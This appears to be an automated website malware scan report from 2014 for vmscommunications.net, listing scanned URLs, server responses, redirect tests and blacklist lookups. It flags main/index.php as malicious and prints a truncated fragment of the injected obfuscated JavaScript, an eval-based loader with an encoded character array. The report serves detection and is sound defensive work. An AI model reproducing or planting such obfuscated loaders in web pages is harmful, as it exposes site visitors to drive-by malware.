Scanned pages/files
Request | Server response | Status |
http://www.vmscommunications.net/ | HTTP/1.1 302 Found Connection: close Date: Sat, 04 Oct 2014 10:09:45 GMT Location: main/index.php Server: Apache/2.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: X-Mapping-bffmijpk=2DF4F78C662E4358F119C4009B372596; path=/ | clean |
http://www.vmscommunications.net/main/index.php | 200 OK Content-Length: 14557 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)window["document"]["body"]="123"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["body"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window.eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e Antivirus reports:
| ||
http://www.vmscommunications.net/main/../_scripts/common.js | 200 OK Content-Length: 3661 Content-Type: application/x-javascript | clean |
http://www.vmscommunications.net/../_scripts/jquery-1.2.3.min.js | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://www.vmscommunications.net/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
http://www.vmscommunications.net/../_scripts/jquery.dimensions.min.js | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://www.vmscommunications.net/../_scripts/jquery.mousewheel.min.js | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://www.vmscommunications.net/../_scripts/jScrollPane.js | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
http://www.vmscommunications.net/../Scripts/AC_RunActiveContent.js | 400 Bad Request Content-Length: 305 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vmscommunications.net
Result:
GET / HTTP/1.1
Host: vmscommunications.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vmscommunications.net
Referer: http://www.google.com/search?q=vmscommunications.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vmscommunications.net
Referer: http://www.google.com/search?q=vmscommunications.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vmscommunications.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vmscommunications.net/
Result: vmscommunications.net is not infected or malware details are not published yet.
Result: vmscommunications.net is not infected or malware details are not published yet.